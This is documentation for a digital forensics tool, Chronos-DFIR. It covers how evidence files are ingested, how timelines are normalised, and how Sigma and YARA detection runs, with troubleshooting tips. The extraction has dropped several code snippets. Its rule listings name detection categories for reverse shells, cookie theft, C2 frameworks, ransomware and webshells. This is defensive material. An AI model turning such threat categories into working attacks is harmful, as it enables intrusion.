Overview
Chronos-DFIR supports ingestion of forensic artifacts (EVTX, MFT, PLIST) and various report formats (CSV, XLSX, JSON, Parquet, SQLite) through a unified drag-and-drop interface. All files pass through a robust normalization and parsing engine to create a unified timeline structure.All ingested data is processed locally — Chronos-DFIR requires no internet connection for evidence processing and detection.
Supported File Formats
Native Forensic Artifacts
EVTX - Windows Event Logs
EVTX - Windows Event Logs
Format: Windows Event Log binary formatProcessing: Optimized EVTX parser extracts:
- EventID, Level, Provider
- Computer, User, timestamps
- EventData fields (CommandLine, ProcessName, IPs, etc.)
C:\Windows\System32\winevt\Logs\Security.evtxC:\Windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx
MFT - Master File Table
MFT - Master File Table
Format: NTFS Master File Table binaryProcessing: Parses
$STANDARD_INFORMATION attributes from MFT records:- Real FILETIME timestamps (Created, Modified, MFT Modified, Accessed)
- File paths and metadata
- Zero timestamp fabrication (forensic integrity guaranteed)
MFTECmd.exe or extract directly:PLIST - macOS Property Lists
PLIST - macOS Property Lists
Format: macOS Property List (binary or XML)Processing: Detects and parses:
- LaunchAgents and LaunchDaemons (persistence mechanisms)
- ProgramArguments, RunAtLoad, KeepAlive flags
- Bundle identifiers and signatures
/Library/LaunchDaemons/*.plist~/Library/LaunchAgents/*.plist/System/Library/LaunchDaemons/*.plist
Report Formats
CSV / TSV
Ingests reports from Plaso, KAPE, EDRs, and custom forensic tools.Features:
- Automatic column detection and normalization
- Handles headerless CSV (e.g.,
ls -laoutput) - UTF-8 and UTF-8 lossy encoding support
- Whitespace-delimited parsing for
pslistand log files
Excel (.xlsx)
Reads Excel spreadsheets with automatic sheet detection.Best for: Analyst-curated reports, EDR exports
First sheet is processed by default. Multi-sheet workbooks use the first populated sheet.
JSON / JSONL / NDJSON
Parses structured event logs in JSON format.Processing:
- Auto-flattens nested JSON structures
- Supports line-delimited JSON (JSONL/NDJSON)
- Handles arrays and nested objects
Parquet
Columnar format for massive datasets.Performance: Streaming ingestion via Polars
scan_parquet — handles multi-GB files without loading into RAM.Best for: Big Data hunting platforms, EDR full dataset exportsSQLite (.db)
Reads SQLite databases directly.Processing:
- Auto-detects tables (prioritizes:
events,logs,timeline,entries) - Extracts first non-system table if no standard table found
Ingestion Workflow
Select Evidence File
Option 1: Drag & DropDrag forensic artifacts directly onto the Chronos-DFIR interface.Option 2: File BrowserClick Select File to open your operating system’s file picker.
Process Artifact
Click Process Artifact to start ingestion.Backend processing:
- SHA256 hash computed during streaming upload (chain of custody)
- Format detection based on file extension and content fingerprinting
- Parsing engine extracts structured data:
- EVTX:
evtx_engine.py - MFT:
mft_engine.pywith real FILETIME parsing - Multi-format:
engine/ingestor.pywith Polars streaming
- EVTX:
- Normalization:
- Timestamps →
Timecolumn (ISO 8601) - EventID detection (Windows Event IDs, custom identifiers)
- IP addresses, usernames, paths extracted to standardized columns
- Timestamps →
- Detection rules applied:
- Sigma rules (86+ rules) evaluated row-by-row
- YARA rules (7 files) scan CommandLine, paths, and message fields
- MITRE ATT&CK mapping enriches detections with TTPs
Processing time: ~10K events/second on Apple Silicon M4 (vectorized Polars engine).
Review Timeline
Once processed, the unified timeline grid displays:
- Timestamp column (pinned, sortable)
- No. (row counter for navigation)
- Tag (checkbox for manual row selection)
- All detected columns from the source file
- Enrichment columns:
Sigma_Tag,YARA_Match,MITRE_Technique
Best Practices
Evidence Handling
Chain of Custody
Chain of Custody
Chronos-DFIR computes SHA256 hash during upload (zero extra I/O).Accessing hash:
- Upload response includes
chain_of_custodyfield with SHA256 + file size - Export Context (JSON) includes hash in metadata section
- Original evidence files remain unmodified
- Processed CSV stored in
upload/directory with normalized schema - No timestamp fabrication (MFT timestamps parsed from real
$STANDARD_INFORMATIONstructs)
Large File Handling
Large File Handling
Files > 50MB: Use streaming ingestion automaticallyImplementation (Supported for: Parquet, CSV, TSV, JSON (line-delimited)
engine/ingestor.py):Multi-Source Ingestion
Multi-Source Ingestion
Current workflow (single-file mode):
- Click Hard Reset ⟲ before loading a new file to prevent cross-contamination
- Each ingestion purges previous DataFrame, UI state, and LocalStorage
- Case-based workflow will support loading multiple files per investigation
- Cross-file correlation engine for unified multi-source timeline
- Phase-based file organization within cases
File Preparation Tips
Clean Column Names
While Chronos normalizes column headers, cleaner source data improves accuracy:Good:
Timestamp,Time,EventTime,CreationTimeEventID,Event ID,event_id
_time→Time_id→Original_Id123→Field_123
Include Forensic Context Columns
For best detection accuracy, ensure your export includes:27 forensic context columns (These columns enrich Sigma detection evidence tables automatically.
engine/sigma_engine.py line 283):Timestamp Format
Supported formats (auto-detected):
- ISO 8601:
2024-03-08T14:23:45.123Z - Windows FILETIME:
132945678901234567 - Unix epoch:
1709912625 - Human-readable:
2024-03-08 14:23:45.123-0800
Time,Timestamp,DateTime,EventTime,CreationTimeCreateTime,ModifiedTime,AccessedTime@timestamp,_time,Timezone(XDR fallback)
If no timestamp column is detected, Chronos operates in “artifact mode” (distribution charts replace timeline histogram).
Troubleshooting Common Issues
Upload Fails or Hangs
Symptom: File upload progress bar stalls or shows error Solutions:File Size Limits
File Size Limits
Browser limit: 6GB+ files may trigger browser memory limitsWorkaround:
-
Split large EVTX files:
-
Convert to Parquet (streaming-friendly):
Encoding Issues
Encoding Issues
Symptom: Garbled text, missing charactersCause: Non-UTF8 file encodingFix: The ingestor auto-retries with
encoding='utf8-lossy'If issues persist, pre-convert:No Events Showing After Processing
Symptom: Grid shows “No data” despite successful upload Causes:Check Time Range Filter
Filters may be hiding all events.Fix: Click Reset Filters ⟳ to clear time range, global search, and column filters
Empty Source File
File may contain only headers or malformed data.Verify:
- Check backend logs (browser DevTools → Console)
- Look for parsing errors:
"row_count": 0in upload response
Timestamps Not Parsing
Symptom:Time column shows original strings instead of formatted timestamps
Solutions:
Column Not Detected
Column Not Detected
Chronos looks for columns named:
Time, Timestamp, DateTime, EventTime, etc.Fix: Rename your timestamp column before upload:Custom Timestamp Format
Custom Timestamp Format
If your timestamps use a non-standard format, they may not auto-parse.Workaround: Pre-convert to ISO 8601:
Sigma/YARA Rules Not Detecting
Symptom: NoSigma_Tag or YARA_Match columns despite known malicious activity
Verify rule coverage:
Check Field Names
Check Field Names
Sigma rules expect specific field names (case-insensitive).Example: Required columns:
rules/sigma/mitre/ta0002_execution/T1059_001_powershell_encoded.ymlImage, CommandLineIf your data uses different names (Process instead of Image), rules won’t match.Fix: Rename columns before ingestion or customize rules in rules/sigma/Rule Categories
Rule Categories
86+ Sigma rules organized by MITRE tactic:
rules/sigma/mitre/ta0001_initial_access/— Phishing, exploit detectionrules/sigma/mitre/ta0002_execution/— PowerShell, WMI, scriptingrules/sigma/mitre/ta0003_persistence/— Registry, scheduled tasks, servicesrules/sigma/artifacts/— Prefetch, ShimCache, AmCache, SRUM, UserAssistrules/sigma/browser/— History manipulation, cookie theftrules/sigma/linux/— Reverse shells, SSH, sudo abuse, auditdrules/sigma/macos/— TCC bypass, Gatekeeper, Authorization plugins
rules/yara/:ransomware/— LockBit, QILIN, generic ransomware patternsc2_frameworks/— Cobalt Strike, Sliver, Meterpreterinfostealers/— Generic infostealer patternslolbin/— Living-off-the-land binary abusewebshells/— PHP/ASP/JSP webshellsmacos/— macOS persistence mechanisms
Next Steps
Filtering & Searching
Learn to navigate and filter your timeline with global search, time ranges, and column management
Detection Rules
Understand Sigma and YARA rule evaluation, and create custom detection logic
Case Management
Organize multi-file investigations with cases, phases, journal entries, and correlation